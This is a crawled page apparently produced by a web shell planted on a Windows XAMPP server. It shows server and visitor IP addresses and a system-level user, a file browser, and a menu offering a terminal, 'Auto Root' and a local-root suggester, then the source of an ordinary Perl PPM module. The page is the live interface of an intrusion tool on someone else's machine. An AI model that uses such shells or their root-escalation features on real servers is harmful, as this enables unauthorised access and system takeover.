Windows NT KAMIDAKI 10.0 build 19045 (Windows 10) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.3.9
Server IP : 192.168.3.16 & Your IP : 216.73.216.204
Domains :
Cant Read [ /etc/named.conf ]
User : SISTEMA
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
C: /
xampp /
perl /
vendor /
lib /
PPM /
XML /
Delete
Unzip
Name
Size
Permission
Date
Action
Element.pm
6.89
KB
-rw-rw-rw-
2012-05-10 15:22
PPD.pm
18.34
KB
-rw-rw-rw-
2012-05-10 15:13
PPMConfig.pm
13.26
KB
-rw-rw-rw-
2012-05-10 15:13
RepositorySummary.pm
1.09
KB
-rw-rw-rw-
2012-05-10 15:14
ValidatingElement.pm
9.62
KB
-rw-rw-rw-
2012-05-10 15:13
Save
Rename
# # PPM::XML::PPMConfig # # Definition of the PPMConfig file format; configuration options for the Perl # Package Manager. # ############################################################################### ############################################################################### # Import everything from PPM::XML::PPD into our own namespace. ############################################################################### package PPM::XML::RepositorySummary; use PPM::XML::PPD ':elements'; ############################################################################### # RepositorySummary Element: Characters ############################################################################### package PPM::XML::RepositorySummary::Characters; @ISA = qw( PPM::XML::Element ); ############################################################################### # RepositorySummary Element: REPOSITORYSUMMARY ############################################################################### package PPM::XML::RepositorySummary::REPOSITORYSUMMARY; @ISA = qw( PPM::XML::ValidatingElement ); @okids = qw( SOFTPKG ); __END__